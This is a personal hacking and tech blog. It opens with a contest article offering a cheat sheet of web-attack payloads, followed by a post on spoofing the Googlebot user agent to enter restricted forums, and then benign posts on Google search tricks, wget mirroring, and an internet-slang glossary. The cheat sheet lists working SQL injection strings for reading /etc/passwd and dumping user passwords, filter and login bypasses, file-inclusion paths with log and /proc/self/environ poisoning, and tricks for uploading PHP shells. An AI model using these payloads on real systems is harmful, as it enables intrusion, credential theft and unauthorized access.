Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...

Browsing the restricted forums without registering

Well it has worked for me and I am posting how you can browse the restricted forums by misusing the SEO things(I guess). A website traffic hugely depends upon the google search and hence most of the websites allow the google bot to crawl and index their pages for appearing in the search result. Now the google bot useragent is allowed to crawl any restricted forum and hence they can index those pages.

The requirement is the useragent switcher add-on for firefox which can be downloaded from HERE. Install this addon and restart it.

Now in the firefox menu, under tools, you will see a new option Default User Agent from where you can choose different user agents and add new user agents. Among the available user agents, you will find the Google Bot 2.1 useragent under the Search Robots option. Choose the Google Bot 2.1 as your default user agent and now start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)

Read more...

Nude.js - Nudity detection with javascript and HTMLCanvas

Today I came across an interesting page on nudity detection with javascript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client side nudity detection for child filter and other social media platforms.

nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).

you can download the nude.js from HERE.

For the demo, visit this page.

Read more...

Searching flash games using Google Search trick

Another google trick, this can be used to search any flash games(swf files) you want to play.

So you just played a flash game which was really cool and you want to download it in your computer? You can use google's search trick to search for any flash game you want.
This trick relies on the way directory listing is done in the webserver's directories. Whenever the default index page or directory listing denying features are not implemented in the web server, we can view the files in the directory. I'm not going into the further detail of this, instead I'm going to show you how to perform the google search for finding whatever flash game you want.

I need the game called gravity which is very fun to play. Now I do the search as below to find it:

"index of /" "last modified" "parent directory" swf gravity

You can replace the gravity with the name of the flash game you want to search and download.

Have fun with this google trick. :)

Read more...

Searching PDFs and DOCs using Google Search

Generally, we use Google search in order to find any information we need. Google is widely used by many of us to find information relevant for us. Sometimes, we may need to find PDF (Portable Document Format) or DOC files and even the PPT (Powerpoint Presentations). This can be easily done using google search trick.

In order to find any type of file in google, we can use special google keyword filetype to specify the type of file we want to search. Put the colon : after the filetype and specify the type of file you want. For example, if you are searching for PDF or DOCs, do the following:

filetype:pdf

filetype:doc

For example, you are searching for the PDFs related to nepali morphological analyzer, you'll do:

nepali morphological analyzer filetype:pdf

You can follow the same process for any other filetypes. Have fun with this google trick. :)

Read more...

Download the full website [Complete Offline Mirroring]

This post will show you how to download the full website and have the complete offline mirror of any website you want.

wget

wget is the Linux terminal command that can be used as a not-interactive network retriever. This tool can be used to download the full website using the switch -r for recursive download.
The command for the complete mirroring is as belows:

wget -r -p http://www.techgaun.blogspot.com

or

wget -mr http://www.techgaun.blogspot.com

If you want to mirror without following to the other sites link, you can enter the command as:

wget -mrnp http://www.techgaun.blogspot.com

If you are on windows, you can use wget for windows from HERE

Using other tools

There are several tools available for making the offline copies of any website.
One of them is HTTrack website copier which is licensed under GPL. You can download this software from HERE

Another such tool is BlackWidow which can be used to scan a site and create a complete profile of the site’s structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf , PHP, CGI, HTM to MIME types from any web sites. You can download this software from HERE

Have fun.. :)

Read more...

Collection of the internet Lang/slang words

This page lists many of the acronyms used in the digital world. Originally taken from some other site and full credit to that site.

0-9
1337 (written in ASCII) - From the word Leet, derived from the word elite
2 - too, or to
4 - For

A
AFAICR/S/T - As far as I can recall / remember / see / tel
AFAIK - As far as I know
AFK - Away from keyboard
ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.
ASAP - As soon as possible
ASL - Age / sex / location
ATEOTD - At The End of the Day
ATM - At the moment
AWOL - Absent Without (Official) Leave
AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B
B2B - Business to Business
B& and/or B7- Banned
BBIAB - Be back in a bit
BBL/S - Be back later / shortly / soon
BCNU - Be seein' you
Blog - Also known as web log or an online journal
BOFH - ~censored~ operator from hell
Bot - Any type of automated software in chatrooms and web-cataloging software
BRB - Be right back
BSOD - Blue Screen of Death
BTDT - Been there done that
BTW - By the way
Bump - Increment (For example, C's ++ operator.)or a backronym for "Bring Up My Post"

C
Crawl - To retrieve a web page along with the hyperlinks that reference it
Crapplet - A poorly written computer application
CU - See you (later)
CYA - See ya OR Cover Your Ass
Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer
Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes 'jacked into'

D
DFTT - Don't feed the trolls
DGAF - Don't Give A ~censored~
DIAF - Die in a fire
DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / ~love~
DND - Do not disturb
DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E
EOF - End Of File
EOM - End of Message
EOL - End of Life. Device or hardware that is at the end of its product life cycle.
EQ - EverQuest
ETA - Estimated time of arrival

F
FAQ - Frequently Asked Question(s)
FFS - For ~censored~'s sake
Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll[3]
FMCDH - From My Cold Dead Hands
FOAD - ~censored~ off and die
FOAF - Friend of a friend
FTL - For the loss
FTW - For the win
FU - ~censored~ you
FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced "foo-bar")
FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)
FWIW - For what it's worth
FYI - For your information

G
GBTW - Get back to work
GF - Great/good fight/girlfriend
GFU - Good for you
GFY - Go ~censored~ yourself
GG - Good game, used at or near the conclusion of a gaming match
GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill
GMTA - Great minds think alike
Godwin's Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler
Gratz - Congratulations
GTFO - Get the ~censored~ out
GTG or G2G - 'Got to go' or 'Good to go'
GR -Good Race
GR8 - Great

H
HAND - Have A Nice Day
Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)
HF - Have fun
Haxor or H4x0r (1337) - Hacker
Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.
Home page - The website's introduction page, starting point, and guide. The technical term is "index"
Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.
HTH - Hope this / that helps
H8 - Hate

I
IANAL - I am not a lawyer
IBTL - In before the lock
IDC - I don't care
IDK - I don't know
IIRC - If I recall / remember correctly
IIUC - If I understand correctly
IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion
Information superhighway - The Internet (AKA: I-way, infobahn)
IONO - I don't know
IOW - In other words
IRC - Internet Relay Chat
IRL - In real life
ITYM - I Think You Mean
IWSN - I want sex now
IYKWIM - If you know what I mean

J
Jaggy - Aliased computer graphics
JK or j/k - Just kidding, or joke
JFGI - Just ~censored~/Freaking Google It

K
k or kk - OK
KISS - Keep it simple stupid.
KS(ing) - Kill-Steal(ing)
KOS - Kill on sight
KTHX - OK, thanks
KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L
L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine
L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.
Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy
Lamer - A know-nothing, one who is lame.
Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite
LFG - Looking for group
LFM - Looking for more
LM(F)AO - Laughing my (frigging) ass off
LMIRL - Let's meet in real life.
LMK - Let me know
LOL - Laughing out loud, laugh out loud
LTNS - Long time no see
Lurker - Someone who frequents a Usenet group without participating in discussions

M
MMORPG, MMO - Massive Multi-player Online Role Playing Game
MMOFPS - Massive Multi-player Online First Person Shooter
MOTD - Message of the day
MS - MapleStory, an MMORPG
MTFBWY - May The Force be with you
MUD - Multi-User Dungeon
MUSH - Multi-User Shared Hallucination
MYOB - Mind your own business
M8 - Mate

N
NE1 - "Anyone"
NFI - "No ~censored~ Idea"
Newbie, noob, or n00b - An inexperienced user of a system or game,or an annoying person.
NIFOC - Naked In Front Of Computer
NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.
NP - No problem
NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.
NVM, NVMD, or nm - Nevermind, not much

O
O RLY - Oh really?
OIC - Oh, I see
OFN - Old ~censored~ news
OMG - Oh my god
OMFG - Oh my ~censored~ god
OMW - On my way or Oh my word
OP - Original poster / Operator / Outpost
OS - Operating system
OT - Off topic
OTOH - On the other hand
OTP - On the phone or One true pairing

P
P2P - Peer to peer, or pay to play
PAW - Parents are watching
PEBKAC/PEBCAK - Problem exists between keyboard and chair
Ping - From the popular network monitoring tool, used as a greeting similar to "Are you there?".
PITA - Pain in the arse / ass
PLMK - Please let me know
PMSL - Pissing myself laughing
POS - Piece of ~love~, or parent over shoulder.
POTS - Plain old telephone service
POV - Point of view
PPL - People
PTKFGS - Punch the Keys For God's Sake
pr0n - Intentional misspelling of porn
PW - Persistent World (gaming)
pwned - Intentional misspelling of owned

Q
QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message


R
Rehi (or merely re) - Hello again
RL - Real Life[3]
RO(T)FL - Rolling on (the) floor laughing
RO(T)FLMAO - Rolling on (the) floor laughing my ass off
RO(T)FLOL - Rolling on (the) floor laughing out loud
RSN - Real soon now (used sarcastically)
RTFB - Read the ~censored~ binary (or book)
RTFS - Read the ~censored~ source
RTFM/RTM - Read the (~censored~) manual

S
SCNR - Sorry, could not resist
sk8/sk8r - skate/skater
Smiley - Another name for emoticons
SMH - Shaking my head
SNAFU - Situation normal: all (~censored~/[3]fouled) up
Snail mail - Normal paper mail service
SOHF - Sense of humor failure
Spider - The program behind a search engine
STFU - Shut the ~censored~ up
STFW - Search the ~censored~ web

T
TANSTAAFL - There ain't no such thing as a free lunch
TBF - Time between failures
TBH - To be honest
TG - That's great
TGIF - Thank god it's Friday
TH(N)X, TNX or TX - Thanks
TIA - Thanks in advance
TINC - There Is No Cabal, a term discouraging conspiracy theories
TMI - Too much information
TOS - Terms of service
TTBOMK - To the best of my knowledge
TTFN - Ta ta for now
TTT - To the top, used in forums to bump a thread
TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)
TTYTT - To Tell You The Truth
Tweedler - One who has deep love for all computer related technology and gadgets
TWIMC - To Whom It May Concern
TY - Thank you
TYT - Take your time
TYVM - Thank you very much

U
U - You
UTFSE - Use the ~censored~ search engine

V

W
w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term "We Own the Other Team".
W/ or W/O - With or without
WB - Welcome back
W/E - Whatever
WRT - With respect / regard to
WTB - Want to buy
WTF - What the ~censored~
WTG - Way to go
WTH - What the hell
WTS - Want to sell
WTT - Want to trade
WUG - What you got?
WoW - World of Warcraft (game)
WUBU2 - What (have) you been up to?
WUU2 - What (are) you up to?
WYSIWYG - What you see is what you get
W8 - Wait
W-BB - warez-bb.org


Y
YARLY - Yeah Really
YHBT - You have been trolled
YKW - You know what?
YMMV - Your mileage may vary.
YTMND - You're The Man Now, Dog
YW - You're welcome.
YOYO- You're On Your Own.


Z
ZOMG - An intentional misspelling of the acronym shorthand for "Oh My God/Gawd" and pronounced "Zoh My God/Gawd" This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG

Read more...

EmailTrackerPro - Email tracking software for tracking the sender

eMailTrackerPro is the tool that can help you track down the email senders by analyzing the email headers. This tool is a product from the VisualWare Inc. which works in network assessment and connection analysis solutions.

eMailTrackerPro asks for the email header and all the tasks is done by this tool. eMailTrackerPro analyzes the email header to find the route or path of the email. And hence it helps to track down the email sender's IP address which can be very useful for dealing with spam emails.

In order to find the email header, you'll have to open the email in your inbox and there should be some location from where you can view the email header. For instance, Yahoo mail has the option called view full header in Actions tab when you're viewing the email(See the screenshot below).

Now, all you've to do is copy these email headers and let the eMailTrackerPro analyze the headers and provide you the IP address of the originating location.

The software will generate the report in HTML format too.

Go to eMailTrackerPro home

Have fun... :)

Read more...